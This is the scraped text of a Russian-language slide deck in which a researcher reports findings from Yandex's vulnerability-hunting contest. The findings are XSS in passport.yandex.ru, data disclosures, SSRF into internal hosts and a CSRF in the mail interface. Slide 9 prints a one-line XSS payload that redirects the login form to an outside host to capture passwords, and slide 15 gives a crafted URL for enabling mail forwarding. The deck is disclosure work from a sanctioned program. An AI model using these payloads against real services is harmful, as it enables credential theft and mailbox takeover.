Месяц поиска уязвимостей Яндекса

Содержание

Слайд 2

Что это было?

Что искать:
межсайтовый скриптинг (XSS);
межсайтовая подделка запросов (CSRF);
небезопасное управление сессией;
инъекции;
ошибки в

Что это было? Что искать: межсайтовый скриптинг (XSS); межсайтовая подделка запросов (CSRF);
механизмах аутентификации и авторизации;
Где искать:
*.yandex.ru, com, com.tr, kz, ua, by, net, st;
*.ya.ru.
*.moikrug.ru.

Слайд 3

Почему искать?

Интерес
Не часто компании такого уровня дают полный карт-бланш в действиях –

Почему искать? Интерес Не часто компании такого уровня дают полный карт-бланш в
хочется посмотреть как всё устроено внутри, в случае успешной атаки;
Интерес
Понять, каков же реальный уровень защищенности сервисов одной из крупнейших IT компаний в России;
Деньги
В случае победы, $5k неплохой бонус за работу, сделаную ради интереса.

Слайд 4

Что искал

RCE, различные переполняшки;
SQL injection;
Способы проникновения во внутреннюю инфраструктуру;
XSS;
CSRF;

Что искал RCE, различные переполняшки; SQL injection; Способы проникновения во внутреннюю инфраструктуру; XSS; CSRF;

Слайд 5

Как искал

Представить, как оно могло бы работать;
Сделать легкий ручной fuzzing, посмотреть на

Как искал Представить, как оно могло бы работать; Сделать легкий ручной fuzzing,
реакцию.

Где искал

mail.yandex.ru

Слайд 6

Что нашел

Пассивные XSS;
Некритичные раскрытия данных;
Различные бесполезные tricks;
CSRF;

да, я знаю, что это lame

Что нашел Пассивные XSS; Некритичные раскрытия данных; Различные бесполезные tricks; CSRF; да,
;)

Слайд 7

XSS уязвимость

Доверенный параметр retpath в passport.yandex.ru

XSS уязвимость Доверенный параметр retpath в passport.yandex.ru

Слайд 8

XSS exploit

Как использовать максимально эффективно?
Украсть не сессию, но логин и пароль.

XSS exploit Как использовать максимально эффективно? Украсть не сессию, но логин и пароль.

Слайд 9


window.onload=function() { document.forms['MainLogin'].action='//kyprizel.net/p.php'; }

Слайд 10

Раскрытия

Neo2 XML + Oracle PL/SQL
Neo2 handlers

Раскрытия Neo2 XML + Oracle PL/SQL Neo2 handlers

Слайд 11

Раскрытия

Modjs.js

Раскрытия Modjs.js …

Слайд 13

Tricks

Произвольные GET запросы через Ленту
в том числе внутри DMZ:
blackbox.yandex.net
csearch.mail.yandex.net
Сканирование портов через mail

Tricks Произвольные GET запросы через Ленту в том числе внутри DMZ: blackbox.yandex.net
collector;
nothing interesting :(

Слайд 14

CSRF

ckey
Не работающая CSRF защита в интерфейсе neo
Как использовать максимально эффективно? - Включить

CSRF ckey Не работающая CSRF защита в интерфейсе neo Как использовать максимально
форвардинг писем на свой адрес.

Слайд 15

CSRF exploit

Step 1

http://mail.yandex.ru/neo2/#setup/filters-confirm/e=Ut7tUs8g8jFFRbI4JOC%2ALUKGjDmZsg%2ANtGNtsYGO66aSjD%2AjgMzkllOOEUyjbUnVLiRMEBkrx34%3D

CSRF exploit Step 1 http://mail.yandex.ru/neo2/#setup/filters-confirm/e=Ut7tUs8g8jFFRbI4JOC%2ALUKGjDmZsg%2ANtGNtsYGO66aSjD%2AjgMzkllOOEUyjbUnVLiRMEBkrx34%3D

Слайд 17

CSRF exploit

Step 2
PROFIT!

CSRF exploit Step 2 PROFIT!
Имя файла: Месяц-поиска-уязвимостей-Яндекса.pptx
Количество просмотров: 89
Количество скачиваний: 0